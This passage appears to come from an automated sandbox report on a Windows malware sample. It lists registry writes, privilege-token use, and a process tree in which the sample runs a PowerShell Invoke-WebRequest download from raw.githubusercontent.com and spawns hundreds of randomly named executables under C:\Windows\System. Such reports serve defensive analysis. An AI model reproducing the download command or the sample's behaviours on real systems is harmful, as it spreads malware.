| Key created | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\80dc2d7acd231de40f111d1119717ed0_NeikiAnalytics.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\80dc2d7acd231de40f111d1119717ed0_NeikiAnalytics.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\80dc2d7acd231de40f111d1119717ed0_NeikiAnalytics.exe
"C:\Users\Admin\AppData\Local\Temp\80dc2d7acd231de40f111d1119717ed0_NeikiAnalytics.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
C:\Windows\System\xPvWnKI.exe
C:\Windows\System\xPvWnKI.exe
C:\Windows\System\zjvilka.exe
C:\Windows\System\zjvilka.exe
C:\Windows\System\PtHygGf.exe
C:\Windows\System\PtHygGf.exe
C:\Windows\System\VSsDrNE.exe
C:\Windows\System\VSsDrNE.exe
C:\Windows\System\zaiqPaj.exe
C:\Windows\System\zaiqPaj.exe
C:\Windows\System\CgNEims.exe
C:\Windows\System\CgNEims.exe
C:\Windows\System\apclgLI.exe
C:\Windows\System\apclgLI.exe
C:\Windows\System\mbFMNHX.exe
C:\Windows\System\mbFMNHX.exe
C:\Windows\System\ftUyhaz.exe
C:\Windows\System\ftUyhaz.exe
C:\Windows\System\tYQDfah.exe
C:\Windows\System\tYQDfah.exe
C:\Windows\System\jzIopth.exe
C:\Windows\System\jzIopth.exe
C:\Windows\System\pEmheoo.exe
C:\Windows\System\pEmheoo.exe
C:\Windows\System\aTwTwnd.exe
C:\Windows\System\aTwTwnd.exe
C:\Windows\System\hiotGkt.exe
C:\Windows\System\hiotGkt.exe
C:\Windows\System\okpqglc.exe
C:\Windows\System\okpqglc.exe
C:\Windows\System\HwmblCG.exe
C:\Windows\System\HwmblCG.exe
C:\Windows\System\XQTtzST.exe
C:\Windows\System\XQTtzST.exe
C:\Windows\System\lFbNZEF.exe
C:\Windows\System\lFbNZEF.exe
C:\Windows\System\sFVTSRL.exe
C:\Windows\System\sFVTSRL.exe
C:\Windows\System\fTTgQna.exe
C:\Windows\System\fTTgQna.exe
C:\Windows\System\RdEdqzy.exe
C:\Windows\System\RdEdqzy.exe
C:\Windows\System\vXzWkaT.exe
C:\Windows\System\vXzWkaT.exe
C:\Windows\System\lTfPfop.exe
C:\Windows\System\lTfPfop.exe
C:\Windows\System\QjGQrCH.exe
C:\Windows\System\QjGQrCH.exe
C:\Windows\System\IPOwzGT.exe
C:\Windows\System\IPOwzGT.exe
C:\Windows\System\RCUfeaX.exe
C:\Windows\System\RCUfeaX.exe
C:\Windows\System\rtfeKkF.exe
C:\Windows\System\rtfeKkF.exe
C:\Windows\System\ccVncHe.exe
C:\Windows\System\ccVncHe.exe
C:\Windows\System\zYhdmZi.exe
C:\Windows\System\zYhdmZi.exe
C:\Windows\System\YrINZoJ.exe
C:\Windows\System\YrINZoJ.exe
C:\Windows\System\SUoppDE.exe
C:\Windows\System\SUoppDE.exe
C:\Windows\System\vKdbnhm.exe
C:\Windows\System\vKdbnhm.exe
C:\Windows\System\laaHjvu.exe
C:\Windows\System\laaHjvu.exe
C:\Windows\System\gQlUVPj.exe
C:\Windows\System\gQlUVPj.exe
C:\Windows\System\OMBnxmd.exe
C:\Windows\System\OMBnxmd.exe
C:\Windows\System\xJHTMEJ.exe
C:\Windows\System\xJHTMEJ.exe
C:\Windows\System\TsWltXN.exe
C:\Windows\System\TsWltXN.exe
C:\Windows\System\gFxlOlJ.exe
C:\Windows\System\gFxlOlJ.exe
C:\Windows\System\bedNttN.exe
C:\Windows\System\bedNttN.exe
C:\Windows\System\HhrsQFg.exe
C:\Windows\System\HhrsQFg.exe
C:\Windows\System\yFtKeCC.exe
C:\Windows\System\yFtKeCC.exe
C:\Windows\System\rQiDVIk.exe
C:\Windows\System\rQiDVIk.exe
C:\Windows\System\NpkKkbu.exe
C:\Windows\System\NpkKkbu.exe
C:\Windows\System\MRBjkBv.exe
C:\Windows\System\MRBjkBv.exe
C:\Windows\System\jnuIJSX.exe
C:\Windows\System\jnuIJSX.exe
C:\Windows\System\EXQlSZf.exe
C:\Windows\System\EXQlSZf.exe
C:\Windows\System\jcDXVsw.exe
C:\Windows\System\jcDXVsw.exe
C:\Windows\System\uGvJajE.exe
C:\Windows\System\uGvJajE.exe
C:\Windows\System\OxhTLtW.exe
C:\Windows\System\OxhTLtW.exe
C:\Windows\System\qYytScm.exe
C:\Windows\System\qYytScm.exe
C:\Windows\System\KakYBPF.exe
C:\Windows\System\KakYBPF.exe
C:\Windows\System\dBaWaQc.exe
C:\Windows\System\dBaWaQc.exe
C:\Windows\System\SoCpjhw.exe
C:\Windows\System\SoCpjhw.exe
C:\Windows\System\lJmEeHE.exe
C:\Windows\System\lJmEeHE.exe
C:\Windows\System\dDGAroB.exe
C:\Windows\System\dDGAroB.exe
C:\Windows\System\GnVOqoL.exe
C:\Windows\System\GnVOqoL.exe
C:\Windows\System\EjKcJGv.exe
C:\Windows\System\EjKcJGv.exe
C:\Windows\System\pOofyuB.exe
C:\Windows\System\pOofyuB.exe
C:\Windows\System\qGzoPqC.exe
C:\Windows\System\qGzoPqC.exe
C:\Windows\System\JlTQbtj.exe
C:\Windows\System\JlTQbtj.exe
C:\Windows\System\WdQJwgb.exe
C:\Windows\System\WdQJwgb.exe
C:\Windows\System\eeRPtTj.exe
C:\Windows\System\eeRPtTj.exe
C:\Windows\System\CdcTbzd.exe
C:\Windows\System\CdcTbzd.exe
C:\Windows\System\dioDzCg.exe
C:\Windows\System\dioDzCg.exe
C:\Windows\System\SFfOJQW.exe
C:\Windows\System\SFfOJQW.exe
C:\Windows\System\DdifYEg.exe
C:\Windows\System\DdifYEg.exe
C:\Windows\System\xWMFeDh.exe
C:\Windows\System\xWMFeDh.exe
C:\Windows\System\gNQxjys.exe
C:\Windows\System\gNQxjys.exe
C:\Windows\System\oNTzaOQ.exe
C:\Windows\System\oNTzaOQ.exe
C:\Windows\System\waIauYr.exe
C:\Windows\System\waIauYr.exe
C:\Windows\System\CLceUKo.exe
C:\Windows\System\CLceUKo.exe
C:\Windows\System\AJdordm.exe
C:\Windows\System\AJdordm.exe
C:\Windows\System\kWwqDqo.exe
C:\Windows\System\kWwqDqo.exe
C:\Windows\System\BJwRXDs.exe
C:\Windows\System\BJwRXDs.exe
C:\Windows\System\wdUgNDi.exe
C:\Windows\System\wdUgNDi.exe
C:\Windows\System\iCECABg.exe
C:\Windows\System\iCECABg.exe
C:\Windows\System\zuPvEzj.exe
C:\Windows\System\zuPvEzj.exe
C:\Windows\System\XKWtevB.exe
C:\Windows\System\XKWtevB.exe
C:\Windows\System\vCHoLYt.exe
C:\Windows\System\vCHoLYt.exe
C:\Windows\System\dVAOIXe.exe
C:\Windows\System\dVAOIXe.exe
C:\Windows\System\TMyxEVh.exe
C:\Windows\System\TMyxEVh.exe
C:\Windows\System\IwUtEzD.exe
C:\Windows\System\IwUtEzD.exe
C:\Windows\System\ZAbbVDX.exe
C:\Windows\System\ZAbbVDX.exe
C:\Windows\System\XScsdyL.exe
C:\Windows\System\XScsdyL.exe
C:\Windows\System\YTfTRVK.exe
C:\Windows\System\YTfTRVK.exe
C:\Windows\System\ofBUwxy.exe
C:\Windows\System\ofBUwxy.exe
C:\Windows\System\SAnhcxh.exe
C:\Windows\System\SAnhcxh.exe
C:\Windows\System\yZJKNvy.exe
C:\Windows\System\yZJKNvy.exe
C:\Windows\System\aySxKYl.exe
C:\Windows\System\aySxKYl.exe
C:\Windows\System\OQhYvfK.exe
C:\Windows\System\OQhYvfK.exe
C:\Windows\System\tgPdDOj.exe
C:\Windows\System\tgPdDOj.exe
C:\Windows\System\tbnVnvG.exe
C:\Windows\System\tbnVnvG.exe
C:\Windows\System\NsotrTQ.exe
C:\Windows\System\NsotrTQ.exe
C:\Windows\System\mxWLOdu.exe
C:\Windows\System\mxWLOdu.exe
C:\Windows\System\BERIYiA.exe
C:\Windows\System\BERIYiA.exe
C:\Windows\System\cLtvVvQ.exe
C:\Windows\System\cLtvVvQ.exe
C:\Windows\System\mipxjQF.exe
C:\Windows\System\mipxjQF.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4168,i,11069752405888604640,8928124405695604965,262144 --variations-seed-version --mojo-platform-channel-handle=3908 /prefetch:8
C:\Windows\System\MZEUGWW.exe
C:\Windows\System\MZEUGWW.exe
C:\Windows\System\LTJFBrp.exe
C:\Windows\System\LTJFBrp.exe
C:\Windows\System\JJHrdHK.exe
C:\Windows\System\JJHrdHK.exe
C:\Windows\System\fcZXJtq.exe
C:\Windows\System\fcZXJtq.exe
C:\Windows\System\HpcpBWg.exe
C:\Windows\System\HpcpBWg.exe
C:\Windows\System\zczeBtA.exe
C:\Windows\System\zczeBtA.exe
C:\Windows\System\merTMyt.exe
C:\Windows\System\merTMyt.exe
C:\Windows\System\axiaMvp.exe
C:\Windows\System\axiaMvp.exe
C:\Windows\System\fFZqVqi.exe
C:\Windows\System\fFZqVqi.exe
C:\Windows\System\xoabMDC.exe
C:\Windows\System\xoabMDC.exe
C:\Windows\System\QydIeAd.exe
C:\Windows\System\QydIeAd.exe
C:\Windows\System\bJXcgZv.exe
C:\Windows\System\bJXcgZv.exe
C:\Windows\System\ADwqqwu.exe
C:\Windows\System\ADwqqwu.exe
C:\Windows\System\HcwrSaJ.exe
C:\Windows\System\HcwrSaJ.exe
C:\Windows\System\kcjxhJf.exe
C:\Windows\System\kcjxhJf.exe
C:\Windows\System\zWfhjHk.exe
C:\Windows\System\zWfhjHk.exe
C:\Windows\System\LFfYsyF.exe
C:\Windows\System\LFfYsyF.exe
C:\Windows\System\RLeujYX.exe
C:\Windows\System\RLeujYX.exe
C:\Windows\System\iaWAZBq.exe
C:\Windows\System\iaWAZBq.exe
C:\Windows\System\JnTliAs.exe
C:\Windows\System\JnTliAs.exe
C:\Windows\System\PrDUMsD.exe
C:\Windows\System\PrDUMsD.exe
C:\Windows\System\RnbKsRs.exe
C:\Windows\System\RnbKsRs.exe
C:\Windows\System\prYYXwn.exe
C:\Windows\System\prYYXwn.exe
C:\Windows\System\BuPNtkX.exe
C:\Windows\System\BuPNtkX.exe
C:\Windows\System\dEHSvNc.exe
C:\Windows\System\dEHSvNc.exe
C:\Windows\System\PuGcMBD.exe
C:\Windows\System\PuGcMBD.exe
C:\Windows\System\NMWCuNZ.exe
C:\Windows\System\NMWCuNZ.exe
C:\Windows\System\lsQATyX.exe
C:\Windows\System\lsQATyX.exe
C:\Windows\System\zkgsWsO.exe
C:\Windows\System\zkgsWsO.exe
C:\Windows\System\eUIEwdh.exe
C:\Windows\System\eUIEwdh.exe
C:\Windows\System\RHnEJqq.exe
C:\Windows\System\RHnEJqq.exe
C:\Windows\System\JTuGnEl.exe
C:\Windows\System\JTuGnEl.exe
C:\Windows\System\FtIGUrY.exe
C:\Windows\System\FtIGUrY.exe
C:\Windows\System\HYJmQAn.exe
C:\Windows\System\HYJmQAn.exe
C:\Windows\System\EDDDSbh.exe
C:\Windows\System\EDDDSbh.exe
C:\Windows\System\AhRvmVR.exe
C:\Windows\System\AhRvmVR.exe
C:\Windows\System\MEmveXD.exe
C:\Windows\System\MEmveXD.exe
C:\Windows\System\lIurAfF.exe
C:\Windows\System\lIurAfF.exe
C:\Windows\System\aoZiDDM.exe
C:\Windows\System\aoZiDDM.exe
C:\Windows\System\nmzOCcZ.exe
C:\Windows\System\nmzOCcZ.exe
C:\Windows\System\MapVYIh.exe
C:\Windows\System\MapVYIh.exe
C:\Windows\System\YcliakF.exe
C:\Windows\System\YcliakF.exe
C:\Windows\System\suREVEU.exe
C:\Windows\System\suREVEU.exe
C:\Windows\System\hjceyGx.exe
C:\Windows\System\hjceyGx.exe
C:\Windows\System\Kpfeqba.exe
C:\Windows\System\Kpfeqba.exe
C:\Windows\System\wgAzBRK.exe
C:\Windows\System\wgAzBRK.exe
C:\Windows\System\XgSiASU.exe
C:\Windows\System\XgSiASU.exe
C:\Windows\System\BbQyqxb.exe
C:\Windows\System\BbQyqxb.exe
C:\Windows\System\esGSNtf.exe
C:\Windows\System\esGSNtf.exe
C:\Windows\System\twJxeFX.exe
C:\Windows\System\twJxeFX.exe
C:\Windows\System\dsEMSeZ.exe
C:\Windows\System\dsEMSeZ.exe
C:\Windows\System\rSvQoiV.exe
C:\Windows\System\rSvQoiV.exe
C:\Windows\System\XqpKoMt.exe
C:\Windows\System\XqpKoMt.exe
C:\Windows\System\FUlrNWG.exe
C:\Windows\System\FUlrNWG.exe
C:\Windows\System\HNJTZzI.exe
C:\Windows\System\HNJTZzI.exe
C:\Windows\System\xhseJDq.exe
C:\Windows\System\xhseJDq.exe
C:\Windows\System\ubmgOTr.exe
C:\Windows\System\ubmgOTr.exe
C:\Windows\System\CRMmuXj.exe
C:\Windows\System\CRMmuXj.exe
C:\Windows\System\oqosdDT.exe
C:\Windows\System\oqosdDT.exe
C:\Windows\System\CRkixxF.exe
C:\Windows\System\CRkixxF.exe
C:\Windows\System\FvmwDer.exe
C:\Windows\System\FvmwDer.exe
C:\Windows\System\dQwmOvY.exe
C:\Windows\System\dQwmOvY.exe
C:\Windows\System\hVZVopB.exe
C:\Windows\System\hVZVopB.exe
C:\Windows\System\JIbPKrE.exe
C:\Windows\System\JIbPKrE.exe
C:\Windows\System\BLzmtRg.exe
C:\Windows\System\BLzmtRg.exe
C:\Windows\System\bkTlPLj.exe
C:\Windows\System\bkTlPLj.exe
C:\Windows\System\yVdruvz.exe
C:\Windows\System\yVdruvz.exe
C:\Windows\System\rRpzSyF.exe
C:\Windows\System\rRpzSyF.exe
C:\Windows\System\HrRdbcA.exe
C:\Windows\System\HrRdbcA.exe
C:\Windows\System\ERnKJGb.exe
C:\Windows\System\ERnKJGb.exe
C:\Windows\System\iHYImTY.exe
C:\Windows\System\iHYImTY.exe
C:\Windows\System\ckOyTRh.exe
C:\Windows\System\ckOyTRh.exe
C:\Windows\System\urNrzUz.exe
C:\Windows\System\urNrzUz.exe
C:\Windows\System\GLleqFt.exe
C:\Windows\System\GLleqFt.exe
C:\Windows\System\RunCnPY.exe
C:\Windows\System\RunCnPY.exe
C:\Windows\System\OEjmEAd.exe
C:\Windows\System\OEjmEAd.exe
C:\Windows\System\uhSCedB.exe
C:\Windows\System\uhSCedB.exe
C:\Windows\System\BoAQWdP.exe
C:\Windows\System\BoAQWdP.exe
C:\Windows\System\CrAOmSp.exe
C:\Windows\System\CrAOmSp.exe
C:\Windows\System\arorKJj.exe
C:\Windows\System\arorKJj.exe
C:\Windows\System\jMdwfjS.exe
C:\Windows\System\jMdwfjS.exe
C:\Windows\System\yaYPPhD.exe
C:\Windows\System\yaYPPhD.exe
C:\Windows\System\ohtugvU.exe
C:\Windows\System\ohtugvU.exe
C:\Windows\System\wDhPXHO.exe
C:\Windows\System\wDhPXHO.exe
C:\Windows\System\jHDgSaW.exe
C:\Windows\System\jHDgSaW.exe
C:\Windows\System\HjyoNUM.exe
C:\Windows\System\HjyoNUM.exe
C:\Windows\System\oJoDSAi.exe
C:\Windows\System\oJoDSAi.exe
C:\Windows\System\bgnKAkD.exe
C:\Windows\System\bgnKAkD.exe
C:\Windows\System\FMfrHOh.exe
C:\Windows\System\FMfrHOh.exe
C:\Windows\System\BzqTUbS.exe
C:\Windows\System\BzqTUbS.exe
C:\Windows\System\GjENEdY.exe
C:\Windows\System\GjENEdY.exe
C:\Windows\System\InEMcAl.exe
C:\Windows\System\InEMcAl.exe
C:\Windows\System\lCSWaCR.exe
C:\Windows\System\lCSWaCR.exe
C:\Windows\System\nZOUMsq.exe
C:\Windows\System\nZOUMsq.exe
C:\Windows\System\ahFLRNW.exe
C:\Windows\System\ahFLRNW.exe
C:\Windows\System\VTvbolV.exe
C:\Windows\System\VTvbolV.exe
C:\Windows\System\nNALuBH.exe
C:\Windows\System\nNALuBH.exe
C:\Windows\System\lXPGRHj.exe
C:\Windows\System\lXPGRHj.exe
C:\Windows\System\yAtBtqW.exe
C:\Windows\System\yAtBtqW.exe
C:\Windows\System\gjzQEgY.exe
C:\Windows\System\gjzQEgY.exe
C:\Windows\System\dQqxCQf.exe
C:\Windows\System\dQqxCQf.exe
C:\Windows\System\FVIEYoT.exe
C:\Windows\System\FVIEYoT.exe
C:\Windows\System\rwqqQfN.exe
C:\Windows\System\rwqqQfN.exe
C:\Windows\System\cpQqHjr.exe
C:\Windows\System\cpQqHjr.exe
C:\Windows\System\nFnrXfs.exe
C:\Windows\System\nFnrXfs.exe
C:\Windows\System\JdXyVcT.exe
C:\Windows\System\JdXyVcT.exe
C:\Windows\System\whpJPhR.exe
C:\Windows\System\whpJPhR.exe
C:\Windows\System\uxJLqMt.exe
C:\Windows\System\uxJLqMt.exe
C:\Windows\System\abjfRUc.exe
C:\Windows\System\abjfRUc.exe
C:\Windows\System\WibCsiA.exe
C:\Windows\System\WibCsiA.exe
C:\Windows\System\MrVBZxF.exe
C:\Windows\System\MrVBZxF.exe
C:\Windows\System\QpkOTaq.exe
C:\Windows\System\QpkOTaq.exe
C:\Windows\System\VxViHKa.exe
C:\Windows\System\VxViHKa.exe
C:\Windows\System\NNcNRxc.exe
C:\Windows\System\NNcNRxc.exe
C:\Windows\System\klGJTDn.exe
C:\Windows\System\klGJTDn.exe
C:\Windows\System\VzrfKPv.exe
C:\Windows\System\VzrfKPv.exe
C:\Windows\System\YIwPIxQ.exe
C:\Windows\System\YIwPIxQ.exe
C:\Windows\System\treppJM.exe
C:\Windows\System\treppJM.exe
C:\Windows\System\gtdeDyo.exe
C:\Windows\System\gtdeDyo.exe
C:\Windows\System\uHmjszp.exe
C:\Windows\System\uHmjszp.exe
C:\Windows\System\Kvsquyk.exe
C:\Windows\System\Kvsquyk.exe
C:\Windows\System\HuaWGrp.exe
C:\Windows\System\HuaWGrp.exe
C:\Windows\System\MZXWvMg.exe
C:\Windows\System\MZXWvMg.exe
C:\Windows\System\XjIKBeh.exe
C:\Windows\System\XjIKBeh.exe
C:\Windows\System\CQWqXJB.exe
C:\Windows\System\CQWqXJB.exe
C:\Windows\System\rTalhNN.exe
C:\Windows\System\rTalhNN.exe
C:\Windows\System\trDFlth.exe
C:\Windows\System\trDFlth.exe
C:\Windows\System\meoqROw.exe
C:\Windows\System\meoqROw.exe
C:\Windows\System\RjjumWF.exe
C:\Windows\System\RjjumWF.exe
C:\Windows\System\TNlcCSx.exe
C:\Windows\System\TNlcCSx.exe
C:\Windows\System\RAeXHUA.exe
C:\Windows\System\RAeXHUA.exe
C:\Windows\System\KbWiFOw.exe
C:\Windows\System\KbWiFOw.exe
C:\Windows\System\JZxFoHF.exe
C:\Windows\System\JZxFoHF.exe
C:\Windows\System\XtxPdUT.exe
C:\Windows\System\XtxPdUT.exe
C:\Windows\System\hSRnOfK.exe
C:\Windows\System\hSRnOfK.exe
C:\Windows\System\fbFGUVZ.exe
C:\Windows\System\fbFGUVZ.exe
C:\Windows\System\tGNCDZi.exe
C:\Windows\System\tGNCDZi.exe
C:\Windows\System\pIdPmTf.exe
C:\Windows\System\pIdPmTf.exe
C:\Windows\System\QxDPskL.exe
C:\Windows\System\QxDPskL.exe
C:\Windows\System\colSnev.exe
C:\Windows\System\colSnev.exe
C:\Windows\System\RfDfxrl.exe
C:\Windows\System\RfDfxrl.exe
C:\Windows\System\QCuUWtd.exe
C:\Windows\System\QCuUWtd.exe
C:\Windows\System\XnVqJnB.exe
C:\Windows\System\XnVqJnB.exe
C:\Windows\System\erLOZFy.exe
C:\Windows\System\erLOZFy.exe
C:\Windows\System\LzcLskC.exe
C:\Windows\System\LzcLskC.exe
C:\Windows\System\YSbWdJW.exe
C:\Windows\System\YSbWdJW.exe
C:\Windows\System\dcbobPD.exe
C:\Windows\System\dcbobPD.exe
C:\Windows\System\jgEvRVT.exe
C:\Windows\System\jgEvRVT.exe
C:\Windows\System\YfZkrxW.exe
C:\Windows\System\YfZkrxW.exe
C:\Windows\System\eWEalnY.exe
C:\Windows\System\eWEalnY.exe
C:\Windows\System\XwRpGGY.exe
C:\Windows\System\XwRpGGY.exe
C:\Windows\System\meRPCMD.exe
C:\Windows\System\meRPCMD.exe
C:\Windows\System\FQjSIfY.exe
C:\Windows\System\FQjSIfY.exe
C:\Windows\System\VSSDRdY.exe
C:\Windows\System\VSSDRdY.exe
C:\Windows\System\tEoHeTA.exe
C:\Windows\System\tEoHeTA.exe
C:\Windows\System\jwEbnUO.exe
C:\Windows\System\jwEbnUO.exe
C:\Windows\System\FCCwapa.exe
C:\Windows\System\FCCwapa.exe
C:\Windows\System\JNQFcYT.exe
C:\Windows\System\JNQFcYT.exe
C:\Windows\System\ykxMnDV.exe
C:\Windows\System\ykxMnDV.exe
C:\Windows\System\GnHbhvm.exe
C:\Windows\System\GnHbhvm.exe
C:\Windows\System\BjESlON.exe
C:\Windows\System\BjESlON.exe
C:\Windows\System\Xbtfvqt.exe
C:\Windows\System\Xbtfvqt.exe
C:\Windows\System\WslUgqU.exe
C:\Windows\System\WslUgqU.exe
C:\Windows\System\bxCAkiJ.exe
C:\Windows\System\bxCAkiJ.exe
C:\Windows\System\bbuXdVo.exe
C:\Windows\System\bbuXdVo.exe
C:\Windows\System\esDRnnd.exe
C:\Windows\System\esDRnnd.exe
C:\Windows\System\YpAAOGZ.exe
C:\Windows\System\YpAAOGZ.exe
C:\Windows\System\mvoidLW.exe
C:\Windows\System\mvoidLW.exe
C:\Windows\System\OUlwvFv.exe
C:\Windows\System\OUlwvFv.exe
C:\Windows\System\gedUNnk.exe
C:\Windows\System\gedUNnk.exe
